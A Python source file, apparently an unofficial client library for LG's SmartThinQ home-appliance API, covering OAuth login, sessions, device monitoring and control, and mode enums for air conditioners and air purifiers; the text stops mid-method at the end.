STATE_AIRPURIFIER_LOW = '약'
STATE_AIRPURIFIER_LOW_MID = '중약'
STATE_AIRPURIFIER_MID = '중'
STATE_AIRPURIFIER_MID_HIGH = '중강'
STATE_AIRPURIFIER_HIGH = '강'
STATE_AIRPURIFIER_POWER = '파워'
STATE_AIRPURIFIER_AUTO = '자동'
STATE_AIRPURIFIER_LONGPOWER = '롱파워'
STATE_AIRPURIFIER_SHOWER = '샤워풍'
STATE_AIRPURIFIER_FOREST = '숲바람'
STATE_AIRPURIFIER_TURBO = '터보'
STATE_AIRPURIFIER_FASTWIND = '빠른바람'
STATE_AIRPURIFIER_CIR_LOWST_LOW = '청정세기_최약'
STATE_AIRPURIFIER_CIR_LOWST = '청정세기_미약'
STATE_AIRPURIFIER_CIR_LOW = '청정세기_약'
STATE_AIRPURIFIER_CIR_LOW_MID = '청정세기_중약'
STATE_AIRPURIFIER_CIR_MID = '청정세기_중'
STATE_AIRPURIFIER_CIR_MID_HIGH = '청정세기_중강'
STATE_AIRPURIFIER_CIR_HIGH = '청정세기_강'
STATE_AIRPURIFIER_CIR_POWER = '청정세기_파워'
STATE_AIRPURIFIER_CIR_AUTO = '청정세기_자동'
STATE_AIRPURIFIER_CIR_LINK = '청정세기_링크'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_GOOD = '좋음'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_NORMAL = '보통'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_BAD = '나쁨'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_VERYBAD = '매우나쁨'
STATE_AIRPURIFIER_SMELL_WEEK = '약함'
STATE_AIRPURIFIER_SMELL_NORMAL = '보통'
STATE_AIRPURIFIER_SMELL_STRONG = '강함'
STATE_AIRPURIFIER_SMELL_VERYSTRONG = '매우강함'
STATE_AIRPURIFIER_NOT_SUPPORTED = '지원안함'
def gen_uuid():
    """Return a freshly generated random (version 4) UUID as a string."""
    fresh = uuid.uuid4()
    return str(fresh)
def oauth2_signature(message, secret):
    """Return the base64-encoded SHA-1 HMAC digest used for OAuth2
    request signatures.

    Both `secret` and `message` are text strings; their UTF-8 encodings
    are what actually get hashed. The result is a bytes object.
    """
    mac = hmac.new(secret.encode('utf8'), message.encode('utf8'), hashlib.sha1)
    return base64.b64encode(mac.digest())
def as_list(obj):
    """Wrap non-lists in lists.

    A list is returned untouched; any other value comes back as a
    single-element list containing it.
    """
    return obj if isinstance(obj, list) else [obj]
class APIError(Exception):
    """Base class for errors reported by the API.

    Carries the server's `code` string and a human-readable `message`.
    """

    def __init__(self, code, message):
        self.message = message
        self.code = code
class NotLoggedInError(APIError):
    """Raised when the API session is missing, invalid, or expired."""

    def __init__(self):
        # Carries no code/message; the condition itself is the signal.
        pass
class TokenError(APIError):
    """Raised when the server rejects an authentication token."""

    def __init__(self):
        # Carries no code/message; the condition itself is the signal.
        pass
class MonitorError(APIError):
    """Raised when monitoring a device fails, typically because the
    monitoring session expired and needs to be restarted.
    """

    def __init__(self, device_id, code):
        self.code = code
        self.device_id = device_id
class NotConnectError(APIError):
    """Raised when the device could not be reached (API code 0106)."""

    def __init__(self):
        # Carries no code/message; the condition itself is the signal.
        pass
def lgedm_post(url, data=None, access_token=None, session_id=None):
    """Make an HTTP POST in the format used by the API servers.

    The request body is JSON wrapped under the `lgedmRoot` key; the
    credentials travel in headers. Returns the JSON payload extracted
    from under the same key in the response.

    `access_token` and `session_id` are required for most normal,
    authenticated requests, but not e.g. for loading the gateway server
    data or starting a session.
    """
    headers = {
        'x-thinq-application-key': APP_KEY,
        'x-thinq-security-key': SECURITY_KEY,
        'Accept': 'application/json',
    }
    if access_token:
        headers['x-thinq-token'] = access_token
    if session_id:
        headers['x-thinq-jsessionId'] = session_id

    response = requests.post(url, json={DATA_ROOT: data}, headers=headers)
    out = response.json()[DATA_ROOT]

    # Translate API-level error codes into exceptions.
    if 'returnCd' in out:
        code = out['returnCd']
        if code != '0000':
            message = out['returnMsg']
            if code == "0102":
                raise NotLoggedInError()
            if code == "0106":
                raise NotConnectError()
            if code == "0010":
                # "0010" is non-fatal: hand the payload back.
                return out
            raise APIError(code, message)

    return out
def gateway_info():
    """Fetch the descriptors of the hosts to use for API interaction."""
    payload = {'countryCode': COUNTRY, 'langCode': LANGUAGE}
    return lgedm_post(GATEWAY_URL, payload)
def oauth_url(auth_base):
    """Construct the browser login URL that starts an authenticated
    OAuth session for the user.
    """
    query = urlencode({
        'country': COUNTRY,
        'language': LANGUAGE,
        'svcCode': SVC_CODE,
        'authSvr': 'oauth2',
        'client_id': CLIENT_ID,
        'division': 'ha',
        'grant_type': 'password',
    })
    base = urljoin(auth_base, 'login/sign_in')
    return '{}?{}'.format(base, query)
def parse_oauth_callback(url):
    """Extract the two OAuth tokens from a login-redirect URL.

    Returns an `(access_token, refresh_token)` pair: the access token
    serves as the API credential and the refresh token obtains updated
    access tokens later.
    """
    query = parse_qs(urlparse(url).query)
    return query['access_token'][0], query['refresh_token'][0]
def login(api_root, access_token):
    """Use an access token to log into the API.

    Returns the server's session information payload.
    """
    payload = {
        'countryCode': COUNTRY,
        'langCode': LANGUAGE,
        'loginType': 'EMP',
        'token': access_token,
    }
    return lgedm_post(urljoin(api_root + '/', 'member/login'), payload)
def refresh_auth(oauth_root, refresh_token):
    """Exchange a refresh_token for a new access_token.

    Raises `TokenError` when the OAuth server rejects the request.
    """
    token_url = urljoin(oauth_root, '/oauth2/token')
    data = {
        'grant_type': 'refresh_token',
        'refresh_token': refresh_token,
    }

    # The timestamp for labeling OAuth requests can be fetched from the
    # date/time endpoint (https://us.lgeapi.com/datetime), but a locally
    # generated one works just as well.
    timestamp = datetime.utcnow().strftime(DATE_FORMAT)

    # The signature covers a fake request URL containing the refresh
    # token plus the timestamp, joined by a newline.
    fake_url = ('/oauth2/token?grant_type=refresh_token&refresh_token=' +
                refresh_token)
    signature = oauth2_signature('{}\n{}'.format(fake_url, timestamp),
                                 OAUTH_SECRET_KEY)

    headers = {
        'lgemp-x-app-key': OAUTH_CLIENT_KEY,
        'lgemp-x-signature': signature,
        'lgemp-x-date': timestamp,
        'Accept': 'application/json',
    }

    res_data = requests.post(token_url, data=data, headers=headers).json()
    if res_data['status'] != 1:
        raise TokenError()
    return res_data['access_token']
class Gateway(object):
    """Bundle of the three server roots used by the client: the auth
    (EMP) server, the main API server, and the OAuth server.
    """

    def __init__(self, auth_base, api_root, oauth_root):
        self.auth_base = auth_base
        self.api_root = api_root
        self.oauth_root = oauth_root

    @classmethod
    def discover(cls):
        """Build a Gateway by querying the gateway-info service."""
        info = gateway_info()
        return cls(info['empUri'], info['thinqUri'], info['oauthUri'])

    def oauth_url(self):
        """Return the browser login URL for this gateway's auth server."""
        return oauth_url(self.auth_base)
class Auth(object):
    """Holds the OAuth credentials (access + refresh tokens) for a
    gateway and knows how to start sessions and refresh itself.
    """

    def __init__(self, gateway, access_token, refresh_token):
        self.gateway = gateway
        self.access_token = access_token
        self.refresh_token = refresh_token

    @classmethod
    def from_url(cls, gateway, url):
        """Create an authentication from an OAuth callback URL."""
        tokens = parse_oauth_callback(url)
        return cls(gateway, tokens[0], tokens[1])

    def start_session(self):
        """Start an API session for the logged-in user.

        Returns the `Session` object together with the list of the
        user's devices reported at login time.
        """
        info = login(self.gateway.api_root, self.access_token)
        return Session(self, info['jsessionId']), as_list(info['item'])

    def refresh(self):
        """Return a new `Auth` carrying a freshly refreshed access
        token (the refresh token is reused).
        """
        token = refresh_auth(self.gateway.oauth_root, self.refresh_token)
        return Auth(self.gateway, token, self.refresh_token)
class Session(object):
    """An active, authenticated API session.

    Wraps an `Auth` plus the server-issued session ID and provides the
    request primitives used by the higher-level device objects.
    """

    def __init__(self, auth, session_id):
        self.auth = auth
        self.session_id = session_id

    def post(self, path, data=None):
        """Make a POST request to the API server.

        This is like `lgedm_post`, but it pulls the context for the
        request from this active Session.
        """
        url = urljoin(self.auth.gateway.api_root + '/', path)
        return lgedm_post(url, data, self.auth.access_token, self.session_id)

    def get_devices(self):
        """Get a list of dicts describing the devices associated with
        the user's account.
        """
        return as_list(self.post('device/deviceList')['item'])

    def monitor_start(self, device_id):
        """Begin monitoring a device's status.

        Return a "work ID" that can be used to retrieve the result of
        monitoring.
        """
        res = self.post('rti/rtiMon', {
            'cmd': 'Mon',
            'cmdOpt': 'Start',
            'deviceId': device_id,
            'workId': gen_uuid(),
        })
        return res['workId']

    def monitor_poll(self, device_id, work_id):
        """Get the result of a monitoring task.

        `work_id` is a string ID retrieved from `monitor_start`. Return
        a status result, which is a bytestring, or None if the
        monitoring is not yet ready.

        May raise a `MonitorError`, in which case the right course of
        action is probably to restart the monitoring task.
        """
        work_list = [{'deviceId': device_id, 'workId': work_id}]
        res = self.post('rti/rtiResult', {'workList': work_list})['workList']

        # Check for errors *before* inspecting the payload. (Bug fix:
        # this check previously sat after the return statements and was
        # unreachable.) returnCode can be missing, which is not an error.
        code = res.get('returnCode')
        if code is not None and code != '0000':
            raise MonitorError(device_id, code)

        # The return data may or may not be present, depending on the
        # monitoring task status. It is base64-encoded binary data that
        # sometimes contains JSON and sometimes other binary formats.
        if 'returnData' in res:
            return base64.b64decode(res['returnData'])
        return None

    def monitor_stop(self, device_id, work_id):
        """Stop monitoring a device."""
        self.post('rti/rtiMon', {
            'cmd': 'Mon',
            'cmdOpt': 'Stop',
            'deviceId': device_id,
            'workId': work_id,
        })

    def set_device_operation(self, device_id, values):
        """Control a device's power/operation state.

        `values` is a key/value map containing the settings to update.
        """
        return self.post('rti/rtiControl', {
            'cmd': 'Control',
            'cmdOpt': 'Operation',
            'value': values,
            'deviceId': device_id,
            'workId': gen_uuid(),
            'data': '',
        })

    def set_device_controls(self, device_id, values):
        """Control a device's settings.

        `values` is a key/value map containing the settings to update.
        """
        return self.post('rti/rtiControl', {
            'cmd': 'Control',
            'cmdOpt': 'Set',
            'value': values,
            'deviceId': device_id,
            'workId': gen_uuid(),
            'data': '',
        })

    def get_device_config(self, device_id, key, category='Config'):
        """Get a device configuration option.

        The `category` string should probably either be "Config" or
        "Control"; the right choice appears to depend on the key.
        """
        res = self.post('rti/rtiControl', {
            'cmd': category,
            'cmdOpt': 'Get',
            'value': key,
            'deviceId': device_id,
            'workId': gen_uuid(),
            'data': '',
        })
        return res['returnData']

    def delete_permission(self, device_id):
        """Release the control permission held for a device."""
        self.post('rti/delControlPermission', {
            'deviceId': device_id,
        })

    def get_power_data(self, device_id, period):
        """Fetch energy-usage data for an AC device over `period`.

        Returns the string '0' when the server reports no data (code
        "0010"); raises `MonitorError` on any other non-success code.
        """
        res = self.post('aircon/inquiryPowerData', {
            'deviceId': device_id,
            'period': period,
        })
        code = res.get('returnCd')  # returnCd can be missing.
        if code == '0000':
            return res['powerData']
        if code == '0010':
            return '0'
        raise MonitorError(device_id, code)

    def get_water_usage(self, device_id, typeCode, sDate, eDate):
        """Fetch water-consumption records between two dates."""
        res = self.post('rms/inquiryWaterConsumptionInfo', {
            'deviceId': device_id,
            'type': typeCode,
            'startDate': sDate,
            'endDate': eDate,
        })
        code = res.get('returnCd')  # returnCd can be missing.
        if code != '0000':
            raise MonitorError(device_id, code)
        return res['item']

    def get_outdoor_weather(self, area):
        """Fetch outdoor weather data for a geographic `area`."""
        res = self.post('weather/weatherNewsData', {
            'area': area
        })
        code = res.get('returnCd')  # returnCd can be missing.
        if code != '0000':
            # Bug fix: the original raised with an undefined `device_id`
            # name (a NameError). There is no device here, so report the
            # area in the device slot instead.
            raise MonitorError(area, code)
        return res
class Monitor(object):
    """A long-lived monitoring task for one device.

    The task is robust to some API-level failures: if the server-side
    monitoring session expires, a new one is started automatically, so
    one `Monitor` is suitable for long-term use. Also usable as a
    context manager (`with Monitor(...) as mon:`).
    """

    def __init__(self, session, device_id):
        self.device_id = device_id
        self.session = session

    def start(self):
        """Open a server-side monitoring task and remember its work ID."""
        self.work_id = self.session.monitor_start(self.device_id)

    def stop(self):
        """Close the current server-side monitoring task."""
        self.session.monitor_stop(self.device_id, self.work_id)

    def poll(self):
        """Return the current status bytestring, or None if the device
        is not ready yet. On a monitoring failure the task is restarted
        and None is returned.
        """
        self.work_id = self.session.monitor_start(self.device_id)
        try:
            return self.session.monitor_poll(self.device_id, self.work_id)
        except MonitorError:
            # Restart the server-side task and report "not ready".
            self.stop()
            self.start()
            return None

    @staticmethod
    def decode_json(data):
        """Decode a bytestring that encodes JSON status data."""
        return json.loads(data.decode('utf8'))

    def poll_json(self):
        """For devices whose status arrives as JSON, return the decoded
        status dict, or None when no status is available yet.
        """
        raw = self.poll()
        if not raw:
            return None
        return self.decode_json(raw)

    def __enter__(self):
        self.start()
        return self

    def __exit__(self, type, value, tb):
        self.stop()
class Client(object):
    """A higher-level API wrapper that provides a session more easily
    and allows serialization of state.
    """
    def __init__(self, gateway=None, auth=None, session=None):
        # The three steps required to get access to call the API.
        self._gateway = gateway
        self._auth = auth
        self._session = session
        # The last list of devices we got from the server. This is the
        # raw JSON list data describing the devices.
        self._devices = None
        # Cached model info data. This is a mapping from URLs to JSON
        # responses.
        self._model_info = {}
    @property
    def gateway(self):
        # Lazily discover the gateway servers on first use.
        if not self._gateway:
            self._gateway = Gateway.discover()
        return self._gateway
    @property
    def auth(self):
        # Authentication cannot be created lazily; it must be supplied
        # via the constructor, `load`, or `from_token`.
        if not self._auth:
            assert False, "unauthenticated"
        return self._auth
    @property
    def session(self):
        # Starting a session also reports the device list, so cache
        # that as a side effect.
        if not self._session:
            self._session, self._devices = self.auth.start_session()
        return self._session
    @property
    def devices(self):
        """DeviceInfo objects describing the user's devices.
        """
        if not self._devices:
            self._devices = self.session.get_devices()
        return (DeviceInfo(d) for d in self._devices)
    def get_device(self, device_id):
        """Look up a DeviceInfo object by device ID.
        Return None if the device does not exist.
        """
        for device in self.devices:
            if device.id == device_id:
                return device
        return None
    @classmethod
    def load(cls, state):
        """Load a client from serialized state.
        """
        # Each key is optional; missing pieces are re-created lazily.
        client = cls()
        if 'gateway' in state:
            data = state['gateway']
            client._gateway = Gateway(
                data['auth_base'], data['api_root'], data['oauth_root']
            )
        if 'auth' in state:
            data = state['auth']
            client._auth = Auth(
                client.gateway, data['access_token'], data['refresh_token']
            )
        if 'session' in state:
            client._session = Session(client.auth, state['session'])
        if 'model_info' in state:
            client._model_info = state['model_info']
        return client
    def dump(self):
        """Serialize the client state."""
        # The keys here mirror exactly what `load` consumes.
        out = {
            'model_info': self._model_info,
        }
        if self._gateway:
            out['gateway'] = {
                'auth_base': self._gateway.auth_base,
                'api_root': self._gateway.api_root,
                'oauth_root': self._gateway.oauth_root,
            }
        if self._auth:
            out['auth'] = {
                'access_token': self._auth.access_token,
                'refresh_token': self._auth.refresh_token,
            }
        if self._session:
            out['session'] = self._session.session_id
        return out
    def refresh(self):
        # Exchange the refresh token for a new access token and start a
        # fresh session with it.
        self._auth = self.auth.refresh()
        self._session, self._devices = self.auth.start_session()
    @classmethod
    def from_token(cls, refresh_token):
        """Construct a client using just a refresh token.
        This allows simpler state storage (e.g., for human-written
        configuration) but it is a little less efficient because we need
        to reload the gateway servers and restart the session.
        """
        client = cls()
        client._auth = Auth(client.gateway, None, refresh_token)
        client.refresh()
        return client
    def model_info(self, device):
        """For a DeviceInfo object, get a ModelInfo object describing
        the model's capabilities.
        """
        # Model descriptions are cached by URL across devices.
        url = device.model_info_url
        if url not in self._model_info:
            self._model_info[url] = device.load_model_info()
        return ModelInfo(self._model_info[url])
class DeviceType(enum.Enum):
    """The category of device.

    The numeric codes are the raw `deviceType` values reported in the
    API's device listing (see `DeviceInfo.type`).
    """
    REFRIGERATOR = 101
    KIMCHI_REFRIGERATOR = 102
    WATER_PURIFIER = 103
    WASHER = 201
    DRYER = 202
    STYLER = 203
    DISHWASHER = 204
    OVEN = 301
    MICROWAVE = 302
    COOKTOP = 303
    HOOD = 304
    AC = 401
    AIR_PURIFIER = 402
    DEHUMIDIFIER = 403
    ROBOT_KING = 501
    ARCH = 1001
    MISSG = 3001
    SENSOR = 3002
    SOLAR_SENSOR = 3102
    IOT_LIGHTING = 3003
    IOT_MOTION_SENSOR = 3004
    IOT_SMART_PLUG = 3005
    IOT_DUST_SENSOR = 3006
    EMS_AIR_STATION = 4001
    AIR_SENSOR = 4003
class DeviceInfo(object):
    """Details about a user's device.

    A thin, read-only view over the JSON dictionary that the API
    returns for each device in the account's device list.
    """

    def __init__(self, data):
        self.data = data

    @property
    def id(self):
        """The unique device identifier."""
        return self.data["deviceId"]

    @property
    def name(self):
        """The user-assigned alias for the device."""
        return self.data["alias"]

    @property
    def macaddress(self):
        """The device's MAC address."""
        return self.data["macAddress"]

    @property
    def model_id(self):
        """The model name (same underlying field as `model_name`)."""
        return self.data["modelNm"]

    @property
    def model_name(self):
        """The model name (same underlying field as `model_id`)."""
        return self.data["modelNm"]

    @property
    def model_info_url(self):
        """URL of the JSON document describing this model's capabilities."""
        return self.data["modelJsonUrl"]

    @property
    def type(self):
        """The kind of device, as a `DeviceType` value."""
        return DeviceType(self.data["deviceType"])

    def load_model_info(self):
        """Fetch and parse the model's capability JSON document."""
        return requests.get(self.model_info_url).json()
# Structured descriptions of a model's configurable values.
EnumValue = namedtuple('EnumValue', ['options'])
RangeValue = namedtuple('RangeValue', ['min', 'max', 'step'])
BitValue = namedtuple('BitValue', ['options'])
ReferenceValue = namedtuple('ReferenceValue', ['reference'])


class ModelInfo(object):
    """A description of a device model's capabilities.

    Parsed from the model JSON document referenced by
    `DeviceInfo.model_info_url`.
    """
    def __init__(self, data):
        self.data = data

    @property
    def model_type(self):
        return self.data['Info']['modelType']

    def value_type(self, name):
        """Return the declared type string for value `name`, or None if
        the model does not describe it.
        """
        if name in self.data['Value']:
            return self.data['Value'][name]['type']
        else:
            return None

    def value(self, name):
        """Look up information about a value.

        Return an `EnumValue`, `RangeValue`, `BitValue` or
        `ReferenceValue` depending on the declared type. String-typed
        values have no structured description and yield None.
        """
        d = self.data['Value'][name]
        if d['type'] in ('Enum', 'enum'):
            return EnumValue(d['option'])
        elif d['type'] == 'Range':
            # Some models omit 'step'; fall back to the natural step of
            # 1 instead of raising KeyError.
            return RangeValue(
                d['option']['min'], d['option']['max'],
                d['option'].get('step', 1),
            )
        elif d['type'] == 'Bit':
            bit_values = {}
            for bit in d['option']:
                bit_values[bit['startbit']] = {
                    'value': bit['value'],
                    'length': bit['length'],
                }
            return BitValue(
                bit_values
            )
        elif d['type'] == 'Reference':
            ref = d['option'][0]
            return ReferenceValue(
                self.data[ref]
            )
        elif d['type'] == 'Boolean':
            return EnumValue({'0': 'False', '1': 'True'})
        elif d['type'] == 'String':
            pass
        else:
            assert False, "unsupported value type {}".format(d['type'])

    def default(self, name):
        """Get the default value, if it exists, for a given value.
        """
        return self.data['Value'][name]['default']

    def option_item(self, name):
        """Get the option mapping for a given value.

        (Returns the `options` member of the value's description --
        not a default; the previous docstring was a copy-paste error.)
        """
        options = self.value(name).options
        return options

    def enum_value(self, key, name):
        """Look up the encoded value for a friendly enum name.
        """
        options = self.value(key).options
        options_inv = {v: k for k, v in options.items()}  # Invert the map.
        return options_inv[name]

    def enum_name(self, key, value):
        """Look up the friendly enum name for an encoded value.

        Falls back to `str(value)` when the model does not describe
        `key` at all.
        """
        if not self.value_type(key):
            return str(value)
        options = self.value(key).options
        return options[value]

    def range_name(self, key):
        """Look up the value of a RangeValue. Not very useful other than
        for comprehension.
        """
        return key

    def bit_name(self, key, bit_index, value):
        """Look up the friendly name for an encoded bit value.
        """
        if not self.value_type(key):
            return str(value)
        options = self.value(key).options
        if not self.value_type(options[bit_index]['value']):
            return str(value)
        enum_options = self.value(options[bit_index]['value']).options
        return enum_options[value]

    def reference_name(self, key, value):
        """Look up the friendly name for an encoded reference value.

        Returns '-' when the value is absent from the reference table.
        """
        value = str(value)
        if not self.value_type(key):
            return value
        reference = self.value(key).reference
        if value in reference:
            comment = reference[value]['_comment']
            return comment if comment else reference[value]['label']
        else:
            return '-'

    @property
    def binary_monitor_data(self):
        """Check that type of monitoring is BINARY(BYTE).
        """
        return self.data['Monitoring']['type'] == 'BINARY(BYTE)'

    def decode_monitor_binary(self, data):
        """Decode binary encoded status data.
        """
        decoded = {}
        for item in self.data['Monitoring']['protocol']:
            key = item['value']
            value = 0
            # Accumulate this field's big-endian bytes into one integer.
            for v in data[item['startByte']:item['startByte'] + item['length']]:
                value = (value << 8) + v
            decoded[key] = str(value)
        return decoded

    def decode_monitor_json(self, data):
        """Decode a bytestring that encodes JSON status data."""
        return json.loads(data.decode('utf8'))

    def decode_monitor(self, data):
        """Decode status data."""
        if self.binary_monitor_data:
            return self.decode_monitor_binary(data)
        else:
            return self.decode_monitor_json(data)
class Device(object):
    """A higher-level interface to a specific device.
    Unlike `DeviceInfo`, which just stores data *about* a device,
    `Device` objects refer to their client and can perform operations
    regarding the device.
    """
    def __init__(self, client, device):
        """Create a wrapper for a `DeviceInfo` object associated with a
        `Client`.
        """
        self.client = client
        self.device = device
        self.model = client.model_info(device)
    def _set_operation(self, value):
        """Set a device's operation for a given `value`.

        `value` is sent as the raw control payload.
        """
        self.client.session.set_device_controls(
            self.device.id,
            value,
        )
    def _set_control(self, key, value):
        """Set a device's control for `key` to `value`.
        """
        self.client.session.set_device_controls(
            self.device.id,
            {key: value},
        )
    def _set_control_ac_wdirvstep(self, key1, value1, key2, value2, key3, value3):
        """Set three controls at once in a single request.

        Used by the AC vane-step control, which must clear other modes
        in the same payload (see `ACDevice.set_wdirvstep`).
        """
        self.client.session.set_device_controls(
            self.device.id,
            {key1: value1, key2: value2, key3:value3},
        )
    def _get_config(self, key):
        """Look up a device's configuration for a given value.
        The response is parsed as base64-encoded JSON.
        """
        data = self.client.session.get_device_config(
            self.device.id,
            key,
        )
        return json.loads(base64.b64decode(data).decode('utf8'))
    def _get_control(self, key):
        """Look up a device's control value.
        """
        data = self.client.session.get_device_config(
            self.device.id,
            key,
            'Control',
        )
        # The response comes in a funky key/value format: "(key:value)".
        _, value = data[1:-1].split(':')
        return value
    def _delete_permission(self):
        # Release the server-side permission acquired for this device.
        self.client.session.delete_permission(
            self.device.id,
        )
    def _get_power_data(self, sDate, eDate):
        """Fetch power usage between `sDate` and `eDate` (both YYYYMMDD)."""
        period = 'Day_'+sDate+'T000000Z/'+eDate+'T000000Z'
        data = self.client.session.get_power_data(
            self.device.id,
            period,
        )
        return data
    def _get_water_usage(self, typeCode, sDate, eDate):
        """Fetch water usage of `typeCode` between the given dates."""
        data = self.client.session.get_water_usage(
            self.device.id,
            typeCode,
            sDate,
            eDate,
        )
        return data
"""------------------for Air Conditioner"""
class ACMode(enum.Enum):
    """The operation mode for an AC/HVAC device.

    Values are the constant identifiers used by the SmartThinQ API.
    """
    OFF = "@OFF"
    NOT_SUPPORTED = "@NON"
    COOL = "@AC_MAIN_OPERATION_MODE_COOL_W"
    DRY = "@AC_MAIN_OPERATION_MODE_DRY_W"
    FAN = "@AC_MAIN_OPERATION_MODE_FAN_W"
    AI = "@AC_MAIN_OPERATION_MODE_AI_W"
    HEAT = "@AC_MAIN_OPERATION_MODE_HEAT_W"
    AIRCLEAN = "@AC_MAIN_OPERATION_MODE_AIRCLEAN_W"
    ACO = "@AC_MAIN_OPERATION_MODE_ACO_W"
    AROMA = "@AC_MAIN_OPERATION_MODE_AROMA_W"
    ENERGY_SAVING = "@AC_MAIN_OPERATION_MODE_ENERGY_SAVING_W"
    SMARTCARE = "@AC_MAIN_WIND_MODE_SMARTCARE_W"
    ICEVALLEY = "@AC_MAIN_WIND_MODE_ICEVALLEY_W"
    LONGPOWER = "@AC_MAIN_WIND_MODE_LONGPOWER_W"
class ACWindstrength(enum.Enum):
    """The wind strength mode for an AC/HVAC device.

    Dual-outlet units encode left/right strengths as a '|'-joined pair;
    SYSTEM_* members are used by single-outlet (system) units.
    """
    NOT_SUPPORTED = "@NON"
    FIX = "@AC_MAIN_WIND_DIRECTION_FIX_W"
    LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W|AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
    MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W|AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
    HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W|AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
    RIGHT_LOW_LEFT_MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W|AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
    RIGHT_LOW_LEFT_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W|AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
    RIGHT_MID_LEFT_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W|AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
    RIGHT_MID_LEFT_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W|AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
    RIGHT_HIGH_LEFT_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W|AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
    RIGHT_HIGH_LEFT_MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W|AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
    RIGHT_ONLY_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
    RIGHT_ONLY_MID = "@AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
    RIGHT_ONLY_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
    LEFT_ONLY_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W"
    LEFT_ONLY_MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W"
    LEFT_ONLY_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W"
    SYSTEM_SLOW = "@AC_MAIN_WIND_STRENGTH_SLOW_W"
    SYSTEM_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_W"
    SYSTEM_MID = "@AC_MAIN_WIND_STRENGTH_MID_W"
    SYSTEM_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_W"
    SYSTEM_POWER = "@AC_MAIN_WIND_STRENGTH_POWER_W"
    SYSTEM_AUTO = "@AC_MAIN_WIND_STRENGTH_AUTO_W"
    SYSTEM_LOW_CLEAN = "@AC_MAIN_WIND_STRENGTH_LOW_CLEAN_W"
    SYSTEM_MID_CLEAN = "@AC_MAIN_WIND_STRENGTH_MID_CLEAN_W"
    SYSTEM_HIGH_CLEAN = "@AC_MAIN_WIND_STRENGTH_HIGH_CLEAN_W"
class ACSwingMode(enum.Enum):
    """The wind-direction (vane swing) mode for an AC device."""
    FIX = "@AC_MAIN_WIND_DIRECTION_FIX_W"
    UPDOWN = "@AC_MAIN_WIND_DIRECTION_UP_DOWN_W"
    LEFTRIGHT = "@AC_MAIN_WIND_DIRECTION_LEFT_RIGHT_W"
class ACReserveMode(enum.Enum):
    """The timer/reservation modes an AC model may support."""
    NONE = "@NON"
    SLEEPTIMER = "@SLEEP_TIMER"
    EASYTIMER = "@EASY_TIMER"
    ONOFFTIMER = "@ONOFF_TIMER"
    WEEKLYSCHEDULE = "@WEEKLY_SCHEDULE"
class ACPACMode(enum.Enum):
    """Auxiliary (PAC) feature modes an AC model may support."""
    NONE = "@NON"
    POWERSAVE = "@ENERGYSAVING"
    AUTODRY = "@AUTODRY"
    AIRCLEAN = "@AIRCLEAN"
    ECOMODE = "@ECOMODE"
    POWERSAVEDRY = "@ENERGYSAVINGDRY"
    INDIVIDUALCTRL = "@INDIVIDUALCTRL"
class ACOp(enum.Enum):
    """Whether a device is on or off.

    Dual-outlet units can power each side independently.
    """
    OFF = "@AC_MAIN_OPERATION_OFF_W"
    RIGHT_ON = "@AC_MAIN_OPERATION_RIGHT_ON_W"
    LEFT_ON = "@AC_MAIN_OPERATION_LEFT_ON_W"
    ALL_ON = "@AC_MAIN_OPERATION_ALL_ON_W"
class AIRCLEAN(enum.Enum):
    """On/off state of the AC air-clean feature."""
    OFF = "@AC_MAIN_AIRCLEAN_OFF_W"
    ON = "@AC_MAIN_AIRCLEAN_ON_W"
class WDIRLEFTRIGHT(enum.Enum):
    """Horizontal (left/right) vane swing state."""
    LEFT_RIGHT_STOP = "@OFF"
    LEFT_RIGTH_ON = "@ON"
    RIGHTSIDE_LEFT_RIGHT = "@RIGHT_ON"
    LEFTSIDE_LEFT_RIGHT = "@LEFT_ON"
    LEFT_RIGHT = "@ALL_ON"
class WDIRVSTEP(enum.Enum):
    """Vertical vane step position (standard encoding)."""
    OFF = "0"
    FIRST = "1"
    SECOND = "2"
    THIRD = "3"
    FOURTH = "4"
    FIFTH = "5"
    SIXTH = "6"
class FOURVAIN_WDIRVSTEP(enum.Enum):
    """Vertical vane step position for four-vane models, which report
    a different numeric encoding than `WDIRVSTEP`.
    """
    OFF = "0"
    FIRST = "8737"
    SECOND = "8738"
    THIRD = "8739"
    FOURTH = "8740"
    FIFTH = "8741"
    SIXTH = "8742"
class ACETCMODE(enum.Enum):
    """Generic on/off state used by several simple AC controls."""
    OFF = "@OFF"
    ON = "@ON"
class ACDevice(Device):
    """Higher-level operations on an AC/HVAC device, such as a heat
    pump.
    """
    @property
    def f2c(self):
        """Get a dictionary mapping Fahrenheit to Celsius temperatures for
        this device.
        Unbelievably, SmartThinQ devices have their own lookup tables
        for mapping the two temperature scales. You can get *close* by
        using a real conversion between the two temperature scales, but
        precise control requires using the custom LUT.
        """
        mapping = self.model.value('TempFahToCel').options
        return {int(f): c for f, c in mapping.items()}
    @property
    def c2f(self):
